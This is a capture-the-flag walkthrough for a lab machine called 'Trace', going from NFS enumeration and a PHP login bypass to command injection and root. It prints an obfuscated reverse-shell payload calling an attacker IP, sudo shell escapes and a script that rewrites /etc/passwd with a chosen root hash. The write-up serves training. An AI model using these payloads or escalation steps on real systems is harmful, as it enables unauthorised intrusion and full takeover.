# Lab setup
Download: Trace
NAT, IP: 192.168.1.180
# Penetration process
# Initial information gathering
```
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http     Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  3,4        111/tcp6    rpcbind
|   100000  3,4        111/udp6    rpcbind
|   100003  3          2049/udp    nfs
|   100003  3          2049/udp6   nfs
|   100003  3,4        2049/tcp    nfs
|   100003  3,4        2049/tcp6   nfs
|   100005  1,2,3      37577/tcp   mountd
|   100005  1,2,3      45651/udp6  mountd
|   100005  1,2,3      52567/tcp6  mountd
|   100005  1,2,3      59427/udp   mountd
|   100021  1,3,4      34220/udp   nlockmgr
|   100021  1,3,4      36633/tcp   nlockmgr
|   100021  1,3,4      37475/tcp6  nlockmgr
|   100021  1,3,4      40397/udp6  nlockmgr
|   100227  3          2049/tcp    nfs_acl
|   100227  3          2049/tcp6   nfs_acl
|   100227  3          2049/udp    nfs_acl
|_  100227  3          2049/udp6   nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
33623/tcp open  mountd   1-3 (RPC #100005)
34597/tcp open  mountd   1-3 (RPC #100005)
36633/tcp open  nlockmgr 1-4 (RPC #100021)
37577/tcp open  mountd   1-3 (RPC #100005)
```
NFS is running, so check what it exports:
```
┌──(root㉿kali)-[~/Desktop]
└─# showmount -e 192.168.1.180
Export list for 192.168.1.180:
/var/www/html *
```
The web root is exported to everyone. Mount it: `mkdir -p /tmp/gddfeng && mount -t nfs -o nolock 192.168.1.180:/var/www/html /tmp/gddfeng` (the option is `-o nolock`; a bare `-nolock` is not what mount expects).
With the usual root_squash export, root on the client is mapped to nobody, so files owned by www-data are read by becoming the local user with the same uid 33: `su -s /bin/bash www-data`.
Reading the file 7828d2f51ceb3aefbd12aa383ec9d5e9/index.html gives a domain name: staffserve.nyx. Point it at 192.168.1.180 in /etc/hosts so it resolves for the next step.
Enumerate virtual hosts: `gobuster vhost -u staffserve.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain`
This finds the subdomain admin3.staffserve.nyx (add it to /etc/hosts as well).
Capture the login request and send the password field as an array instead of a string: `login=admin&password[]=admin`. The check is bypassed (the usual cause is a loose PHP comparison such as strcmp(), which returns NULL for an array argument and NULL == 0 is true; the writeup does not show the server code). The admin page gives a new hint: networkteste.nyx.
Enumerate subdomains of that domain too; this finds ping.networkteste.nyx.
The page is a ping form whose host parameter goes straight into a shell, i.e. command injection: `curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1%7Cid&submitt=Ping'`
Reverse shell (start `nc -lvnp 4444` on 192.168.1.129 first): `curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1|bas\h -c "/usr/b?n/n[c] -e /\\b\i\n/////s\h 192.168.1.129 4444"&submitt=Ping'`
The backslashes, the `?`/`[c]` globs and the repeated slashes keep the literal strings bash, nc and /bin/sh out of the request; the target's shell removes the backslashes and expands the globs and still runs the same command.
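The following is an added example, not part of the writeup, that shows what the obfuscated payload turns into after the target's two shells parse it, without executing anything: the command name is pushed behind printf, so the shell still does its backslash removal, quote removal and pathname expansion and then prints each resulting word. The writeup does not show the target's filter, so the blacklist below is hypothetical, and the nc path is prefixed with a temporary sandbox directory so the glob has a match offline (assuming, as the successful callback implies, that the target really had /usr/bin/nc).

```shell
#!/bin/sh
# Added example, not from the writeup: expand the obfuscated reverse-shell
# payload the way the target's shells would, without running it.

# The payload exactly as curl sent it (single quotes keep every backslash).
raw_payload='bas\h -c "/usr/b?n/n[c] -e /\\b\i\n/////s\h 192.168.1.129 4444"'

# Constructed sandbox so /usr/b?n/n[c] has exactly one match on this machine
# (assumption: the target had /usr/bin/nc). Only the nc path is prefixed.
sandbox=$(mktemp -d)
mkdir -p "$sandbox/usr/bin"
: > "$sandbox/usr/bin/nc"
payload='bas\h -c "'"$sandbox"'/usr/b?n/n[c] -e /\\b\i\n/////s\h 192.168.1.129 4444"'

# expand_words STRING: print, one per line, the words a POSIX shell would pass
# to execve() for STRING. Same parsing as `sh -c "$STRING"`, but the command
# name is shifted behind printf so nothing is executed.
expand_words() {
    sh -c 'printf "%s\n" '"$1"
}

# Stage 1: the /bin/sh spawned by the PHP ping form sees
#   ping -c 1 127.0.0.1|bas\h -c "..."
# bas\h -> bash, and the double-quoted argument loses one layer of backslashes
# (\\ -> \, while \b \i \n \h are kept because they are not special inside "").
stage1_command() { expand_words "$payload" | sed -n '3p'; }

# Stage 2: bash -c parses that argument again: the glob resolves to nc and
# /\b\i\n/////s\h collapses to /bin/////sh, which the kernel opens as /bin/sh.
stage2_argv0() { expand_words "$(stage1_command)" | sed -n '1p'; }
stage2_shell() { expand_words "$(stage1_command)" | sed -n '3p'; }

# Hypothetical substring blacklist of the kind this obfuscation is built to
# pass (assumption: the writeup does not show the target's filter).
# Exit status 0 means the request would be rejected.
blocked_by_naive_filter() {
    printf '%s' "$1" | grep -qE 'bash|nc|/bin/sh'
}

echo "stage 1 words:"; expand_words "$payload"
echo "stage 2 words:"; expand_words "$(stage1_command)"
if blocked_by_naive_filter "$raw_payload"; then
    echo "raw payload: blocked"
else
    echo "raw payload: passes the naive filter"
fi
```

Stage 1 prints `bash`, `-c` and the inner string; stage 2 prints the nc path, `-e`, `/bin/////sh`, the IP and the port. The same raw request does not match a naive `bash|nc|/bin/sh` blacklist, which is the whole point of the obfuscation; a filter that wants to stop this has to allow-list the host format rather than deny-list command names.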
Look at /var/www/site1/random.php
It contains a password: m3g4S3cuR3p4zzW0rd
```
www-data@trace:/var/www/site1$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
yan:x:1000:1000:yan,,,:/home/yan:/bin/bash
nel:x:1001:1001::/home/nel:/bin/bash
```
Try `su yan` with that password: it works, we are logged in as yan.
# Privilege escalation
yan may run octave as nel through sudo, and octave can spawn a shell: `sudo -u nel octave --eval 'system("/bin/sh")'`
This gives a shell as nel.
nel may run wuzz (an HTTP client) through sudo, which means it can write files as root. Back up the target's /etc/passwd, take a copy to the attacker machine and replace the `x` in root's password field with a hash of a password you choose; serve the edited file over HTTP from the attacker box, fetch it with `sudo wuzz` and save the response body over /etc/passwd on the target. Keep the backup: if anything other than root's password field changes, accounts on the box can break.
Then `su root` with the password you set and the box is done.
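The following is an added example, not part of the writeup, that prepares the replacement /etc/passwd on the attacker box and checks it before it is uploaded. The sample passwd is constructed from the users listed above, `gen_hash` assumes openssl(1) on the attacker machine, and `Passw0rd!` is only a demo password.

```shell
#!/bin/sh
# Added example, not from the writeup: build passwd.new with a root hash and
# verify that it differs from the original in root's password field only.

# Constructed sample of the target's passwd, modelled on the users seen above.
sample_passwd='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
yan:x:1000:1000:yan,,,:/home/yan:/bin/bash
nel:x:1001:1001::/home/nel:/bin/bash'

# gen_hash PASSWORD: SHA-512 crypt hash of PASSWORD (assumes openssl(1) on the
# attacker box). A hash in field 2 of /etc/passwd takes precedence over the
# "x" that defers the lookup to /etc/shadow.
gen_hash() {
    openssl passwd -6 "$1"
}

# set_root_hash HASH < passwd.orig > passwd.new
# Rewrites only field 2 of the root line; every other line passes through.
set_root_hash() {
    awk -F: -v OFS=: -v h="$1" '$1 == "root" { $2 = h } { print }'
}

# verify_passwd ORIG NEW: succeed only if NEW equals ORIG except that root's
# password field is now something other than "x" or empty.
verify_passwd() {
    norm_orig=$(mktemp)
    norm_new=$(mktemp)
    awk -F: -v OFS=: '$1 == "root" { $2 = "*" } { print }' "$1" > "$norm_orig"
    awk -F: -v OFS=: '$1 == "root" { $2 = "*" } { print }' "$2" > "$norm_new"
    cmp -s "$norm_orig" "$norm_new"
    same=$?
    rm -f "$norm_orig" "$norm_new"
    [ "$same" -eq 0 ] || return 1
    root_field=$(awk -F: '$1 == "root" { print $2 }' "$2")
    [ -n "$root_field" ] && [ "$root_field" != x ]
}

# Walk-through on the constructed sample.
work=$(mktemp -d)
printf '%s\n' "$sample_passwd" > "$work/passwd.orig"
if command -v openssl >/dev/null 2>&1; then
    root_hash=$(gen_hash 'Passw0rd!')         # real hash: su root with Passw0rd!
else
    root_hash='$6$constructed$placeholder'   # constructed stand-in, not a real hash
fi
set_root_hash "$root_hash" < "$work/passwd.orig" > "$work/passwd.new"
if verify_passwd "$work/passwd.orig" "$work/passwd.new"; then
    echo "$work/passwd.new is safe to serve and fetch with sudo wuzz"
else
    echo "refusing: $work/passwd.new changes more than root's password field" >&2
fi
```

Serve `passwd.new` from the attacker machine only after `verify_passwd` succeeds; the check is what stands between "root password set" and "every account on the target broken by a stray edit".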